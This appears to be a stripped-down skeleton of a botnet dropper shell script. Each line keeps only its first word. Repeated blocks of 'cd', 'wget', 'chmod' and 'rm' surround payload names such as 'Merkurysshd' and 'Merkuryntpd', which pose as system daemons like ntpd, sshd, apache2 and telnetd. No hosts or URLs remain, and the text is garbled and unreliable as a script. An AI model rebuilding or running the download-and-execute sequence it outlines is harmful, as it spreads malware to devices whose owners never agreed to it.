cd
cd
cd
cd
cd
wget
chmod
Merkuryntpd
rm
cd
cd
cd
cd
cd
wget
chmod
Merkurysshd
rm
cd
cd
cd
cd
cd
wget
chmod
Merkuryopenssh
rm
cd
cd
cd
cd
cd
wget
chmod
Merkurybash
rm
cd
cd
cd
cd
cd
wget
chmod
Merkurytftp
rm
cd
cd
cd
cd
cd
wget
chmod
Merkurywget
rm
cd
cd
cd
cd
cd
wget
chmod
Merkurycron
rm
cd
cd
cd
cd
cd
wget
chmod
Merkuryftp
rm
cd
cd
cd
cd
cd
wget
chmod
Merkurypftp
rm
cd
cd
cd
cd
cd
wget
chmod
Merkurysh
rm
cd
cd
cd
cd
cd
wget
chmod
 
rm
cd
cd
cd
cd
cd
wget
chmod
apache2
rm
cd
cd
cd
cd
cd
wget
chmod
telnetd
rm
